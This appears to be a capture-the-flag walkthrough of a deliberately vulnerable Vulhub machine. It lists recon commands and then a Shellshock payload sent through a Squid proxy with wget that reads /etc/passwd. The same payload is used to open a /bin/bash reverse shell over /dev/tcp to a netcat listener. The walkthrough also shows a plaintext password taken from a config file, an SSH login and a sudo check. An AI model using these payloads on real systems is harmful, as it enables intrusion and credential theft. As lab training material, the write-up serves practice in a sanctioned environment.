From Vulhub


  • netdiscover
  • Nmap
  • Metasploit
  • FoxyProxy

Use netdiscover to detect target IP address

netdiscover -i eth0 -r is the target.

Then run nmap to detect opening ports and running services on the target machine.

nmap -sV -v -O -A -T5 -p-

Looks like port 22 and port 3218 are openning. Port 3218 is running Squid. open msfconsole, search squid. I found that:

Then use this module to scan the squid service:

Looks like port 80 is opened:

Use FoxyProxy add-on to configure proxy:

now visit

now let’s use nikto to scan the server:

nikto -h localhost -useproxy

looks like there is a shellshock vuln

Let’s test it:

wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" -e use_proxy=on -e http_proxy= ""

It works and looks there is an account sickos.

Now lets setup reverse shell.

netcat-style shell access without netcat:

/bin/bash -i > /dev/tcp/[yourip]/[port] 0<&1

in one terminal:

nc -nlvp 4444

in another terminal:

wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/bash -i > /dev/tcp/ 0<&1" -e use_proxy=on -e http_proxy= ""

get the shell:

After Enumeration, got a interesting file: /var/www/wolfcms/config.php

Looks like the password is john@123

SSH to the target server as sickos and use this password:

Check sickos’s privilege:

sudo -l

Looks like it can run as root